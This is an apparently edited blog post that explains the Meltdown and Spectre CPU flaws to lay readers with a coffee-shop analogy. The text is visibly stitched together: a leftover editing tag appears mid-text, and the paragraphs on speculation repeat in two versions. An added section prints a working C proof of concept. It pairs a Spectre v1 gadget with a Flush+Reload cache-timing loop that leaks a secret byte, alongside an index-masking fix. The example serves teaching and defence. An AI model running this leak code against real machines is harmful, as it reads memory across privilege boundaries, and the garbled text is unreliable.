
The Spectre of Intel’s (Past) Meltdown

The Internet is abuzz with reports of two major vulnerabilities codenamed “Meltdown” and “Spectre”. They were independently discovered by several teams, including security researchers at Cyberus Technology, Google’s Project Zero, and the Graz University of Technology.

Thousands of articles have already been written about this. So what’s new in this blog post? I read a lot of the information available on the internet before writing this article and found that:

a) Some of the articles contain highly technical information and jargon that make no sense to the common man.

b) Most of the articles do not explain what the real deal is and just touch upon the basics of good information security practices.

c) Leading press houses have taken this opportunity to thrash the tech companies over such vulnerabilities.

So if you just want to understand what “Meltdown” and “Spectre” mean in extremely simple terms, read on.

The Speculation Problem

Do you have a favorite restaurant that you have been going to for years? If yes, you will have noticed that the waiter knows what your favorite is.

Or imagine the coffee shop you step into every morning, where the lady on the other side has your cappuccino ready with a “Just the way you like it, John”.

In both scenarios, the waiter and the waitress have assumed, or rather speculated, what you are going to order based on your history.

Now let’s say that the coffee shop makes the coffee extra special for you by putting your name tag on the cup. Every day, you see your name on it and love it.

But one fine day, when you step into the shop, you order an espresso rather than a cappuccino. The shopkeeper is taken aback, as he has the order ready, remember, with your name on it and just the way you like it. Since you changed the order, he throws that cup in the dustbin and makes you an espresso.

So far, so good. Are you wondering whether I forgot that this article is about “Meltdown” and not about coffee? Hold your horses, the story is about to get better, and I did not forget about “Meltdown”. When the shopkeeper throws the cup away, the garbage collector is able to read your name off the cup, even if only for a moment.

Still wondering how “Meltdown” fits into this story? Read on. Our computers work in a similar fashion. They use a technique known as “speculative execution”: the processor performs certain operations before it is known for certain that they will be required, on the premise that these guesses turn out right often enough to save time.
</gre_replace>
<gr_replace lines="35-39" cat="clarify" orig="So when you give">
Think of it like this: when you open MS Word, the computer guesses that you will click on “File” next, based on your usage pattern, and gets that work done ahead of time. The real speculation does not happen at the level of your mouse clicks, though; it happens inside the processor, billions of times a second, at the level of individual instructions. Whenever a program reaches a fork in the road (an “if” whose outcome depends on data the processor is still waiting for from memory), the chip guesses which way the program will go and starts executing down that path right away. Modern chips have sophisticated “branch predictors” that base this guess on what the program did the last few times, and they are right roughly 99% of the time.

Now, when the guess turns out wrong (you close Word instead of clicking “File”), the processor throws away the results of the work it did down the wrong path, just as the shopkeeper throws away your cappuccino.

The thrown-away work is supposed to leave no trace, but it does: the data it touched is still sitting in the processor’s cache, like your name on the cup in the bin, and a carefully written program can measure the cache to read it back. Exploiting this is what “Meltdown” and “Spectre” are about. They differ in how they make the processor speculate on the wrong thing: Meltdown lets an ordinary program read the operating system kernel’s memory, while Spectre tricks another program (including the browser in which a malicious web page is running) into speculatively reading its own secrets on the attacker’s behalf.

So when you give an instruction to open say MS Word, the computer speculates that you may click on “File” as your next step based on usage pattern. So based on this speculation, it sends this information to the processor for processing to save time. Modern computer chips have sophisticated “branch predictors” that use fancy algorithms to determine what your next step would be and they are correct 99% of the times.

Now when you open MS Word, instead of clicking on “File”, you decide to close the program altogether. However, the computer had speculated that you would click on “File”. Now basis this new instruction, it throws away the previous instruction.

This information which is thrown away can be hacked or spied upon by the hackers and this weakness which can be exploited is dubbed as "Meltdown" and "Spectre". They differ in the way this is done.

I want to meet the Kernel

There is a new villain in town, and yes, it wants to meet the Kernel. Let’s understand who the “Kernel” is.

He is the boss, and only he decides who can meet whom in the town. In computer terms, the kernel is the core of the operating system, with complete control over everything in the system. Every program has to go through the kernel’s front door (system calls) to get anything done, but no ordinary program is allowed to read the kernel’s own memory, which holds passwords, encryption keys and the data of every other program on the machine.

Now, let’s say that this villain knows a trick called a “side channel”. To understand a “side-channel” attack, consider that I follow you around every day without ever speaking to you. From this spy work alone, I am able to gather a lot of information about you and your habits. The side channel used by both attacks is timing: reading data that is already in the processor’s cache is measurably faster than fetching it from memory, so by timing its own memory accesses a program can tell what the processor touched during speculation.

“Meltdown” and “Spectre” are the villains here who know about the “Kernel” and his deeds, the deed being the speculative execution of instructions whose results are thrown away, but not before they have left a trace in the cache that anyone can time. This is what the security researchers targeted. When Intel processors (which are affected by Meltdown; AMD processors are not) perform speculative execution, they do not check privileges until the speculative load has already happened, so they don’t fully segregate low-privilege, untrusted processes from the highest-privilege memory in the computer’s kernel. That means an attacker can trick the processor into letting unprivileged code peek into the kernel’s memory with speculative execution.
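To make the last two sections concrete, here is an added example, written for this edit and not taken from the original post or from the researchers’ proof-of-concept code. It shows the Spectre variant 1 pattern: a correctly bounds-checked function (the shopkeeper making the coffee before you order), the branchless index-masking fix that the Linux kernel adopted for such code, and the cache-timing side channel (the garbage collector timing how quickly each cup comes back) used to read what the mis-speculated load touched. Meltdown uses the same cache channel but aims it at kernel memory, which cannot be demonstrated safely from a user program. The array names follow the Spectre paper’s description; the sample secret, the 80-cycle hit threshold and the loop counts are assumptions for this illustration. The timing part only compiles on x86-64, and whether it actually recovers the secret depends on the CPU, compiler flags and microcode; the index mask works everywhere.

```c
/* Added example (not from the original post or the researchers' PoC): the
 * Spectre v1 gadget, the index-masking fix, and a Flush+Reload probe.
 * Sample secret, thresholds and loop counts are assumptions. Build: gcc -O1 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#if defined(__x86_64__)
#include <x86intrin.h>
#endif

#define PAGE 4096
uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
size_t array1_size = 16;
uint8_t array2[256 * PAGE];                 /* probe array: one page per byte value */
const char secret[] = "Constructed secret"; /* constructed; lives somewhere near array1 */
volatile uint8_t sink;

/* VULNERABLE: the check is correct, but while array1_size is fetched from
 * memory the CPU guesses the branch and may run the body with an out-of-bounds
 * idx. array1[idx] can then be any byte in memory, and the dependent load pulls
 * array2[byte * PAGE] into cache. The squash discards idx, not the cache line. */
void victim_vulnerable(size_t idx) {
    if (idx < array1_size)
        sink = array2[array1[idx] * PAGE];
}

/* FIX: all-ones when idx < size, zero otherwise, computed without a branch so
 * speculation cannot skip it (same construction as Linux's
 * array_index_mask_nospec; relies on the arithmetic right shift that GCC and
 * Clang perform on signed values). */
size_t index_mask_nospec(size_t idx, size_t size) {
    intptr_t x = (intptr_t)(idx | (size - idx - 1)); /* top bit clear only if idx < size */
    return (size_t)(~x >> (sizeof(intptr_t) * 8 - 1));
}
size_t clamp_index(size_t idx, size_t size) { return idx & index_mask_nospec(idx, size); }

void victim_hardened(size_t idx) {
    if (idx < array1_size) {
        idx = clamp_index(idx, array1_size); /* a mispredicted call now reads array1[0] */
        sink = array2[array1[idx] * PAGE];
    }
}

#if defined(__x86_64__)
/* Flush+Reload attack loop: flush the probe pages, train the predictor with
 * in-bounds calls, slip in the target index while array1_size is uncached, then
 * time a reload of every probe page. Returns the byte value whose page was hot
 * most often (the training byte itself is excluded from the tally). */
int leak_byte(void (*victim)(size_t), size_t target_idx) {
    unsigned hits[256] = {0};
    for (int round = 0; round < 200; round++) {
        size_t train = round % array1_size;
        for (int i = 0; i < 256; i++) _mm_clflush(&array2[i * PAGE]);
        for (int j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);                     /* force the slow path */
            for (volatile int z = 0; z < 100; z++) {}      /* let the flush land */
            size_t x = ((j % 6) - 1) & ~0xFFFF;            /* ~0 on every 6th call, else 0 */
            x = x | (x >> 16);
            x = train ^ (x & (train ^ target_idx));        /* branchless select */
            victim(x);
        }
        for (int i = 0; i < 256; i++) {
            int m = (i * 167 + 13) & 255;                  /* scrambled order vs. prefetcher */
            unsigned aux;
            uint64_t t0 = __rdtscp(&aux);
            sink = array2[m * PAGE];
            uint64_t dt = __rdtscp(&aux) - t0;
            if (dt < 80 && m != array1[train]) hits[m]++;  /* 80 cycles: assumed hit threshold */
        }
    }
    int best = 0;
    for (int i = 1; i < 256; i++) if (hits[i] > hits[best]) best = i;
    return best;
}
#endif

int main(void) {
    printf("clamp_index(5, 16) = %zu, clamp_index(20, 16) = %zu\n",
           clamp_index(5, 16), clamp_index(20, 16));
#if defined(__x86_64__)
    /* Out-of-bounds distance from array1 to secret[0]; wraps harmlessly if negative. */
    size_t target = (size_t)(secret - (const char *)array1);
    int v = leak_byte(victim_vulnerable, target);
    int h = leak_byte(victim_hardened, target);
    printf("vulnerable gadget leaked 0x%02x ('%c'), expected '%c'\n", v, v, secret[0]);
    printf("hardened gadget yielded  0x%02x (array1[0] is %d)\n", h, (int)array1[0]);
#else
    puts("timing probe needs x86-64; the index mask is portable");
#endif
    return 0;
}
```

Architecturally the two victim functions behave identically: an out-of-bounds index does nothing in either. The difference is only visible through the cache, which is why ordinary testing never found this class of bug. On a susceptible machine the vulnerable gadget reports the first byte of the secret, while the hardened one can at best report the value of array1[0], because the mask has forced the index to zero before the speculative load.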

Let’s Call the Patch Guy

Well, can you change the “Kernel”? Not the part that matters here. We need to understand that both “Meltdown” and “Spectre” are hardware bugs and not software bugs. It’s the way modern processors were built. The kernel (the software) can be patched to work around the bug, and it has been, but that is a workaround, not a cure.

Imagine that you built your house years ago. Now you discover an issue with the design that could let a thief into your house through the back door. Can you change the house design now? No; you need to redesign the house. In a similar fashion, the chip makers have to redesign how their processors handle speculation, and until then the operating system can only add locks to the back door.

Are you wondering what happened to the patches issued by the tech companies? To understand them, let’s go back to the coffee analogy. Now that the shopkeeper knows he cannot trust his guess, what does he do? He either asks the waiter to wait until you give the order, or he stops writing your name on the cup, so nothing interesting is left in the bin.

The patches do both, in different places. For Meltdown, the operating system patches (known as KAISER or KPTI on Linux) keep the kernel’s memory out of reach of ordinary programs altogether, so speculation has nothing secret to read. For Spectre, compiler, kernel and processor microcode updates (retpoline, IBRS and similar) stop the processor from speculating at the specific places where it could be tricked. The patches make it difficult for the villain to “spy” on what Mr. Kernel is doing, at some cost in performance.

So what should you do? I wish I had a better answer. We are dependent on Intel, AMD, ARM and the tech companies to issue patches that work around the problem until redesigned chips arrive. But is it really that bad? Trust me, it’s not. While the threat is real, these are not remote code execution bugs: the attacker first has to get code running on your machine (for Spectre, the JavaScript of a malicious web page counts), and even then reading memory this way is slow and noisy. It is not cost effective for the bad guys to spend that much time and energy on personal computers.

Well, for nation-states and national security, it’s a different game altogether, and so it is for shared cloud servers, where one customer’s program could read another customer’s memory. Until the redesigned chips arrive, we can just keep our systems updated with the latest patches and implement best information security practices. Don’t look at me like that … yeah, I mentioned it too.

In case you want to know more about the advisories issued, Meltdownattack.com has a full list of vendor advisories along with the academic papers on Meltdown and Spectre (PDF). Cyberus Technology has its own blog post about the threats.

Do share your comments and feedback in the comments section below.


Disclaimer:

The views and opinions expressed herein are my own. They do NOT intend to represent the views or opinions of my employer or any other organization. Any information represented as fact are believed by me to be true, but I make no legal claim as to their certainty.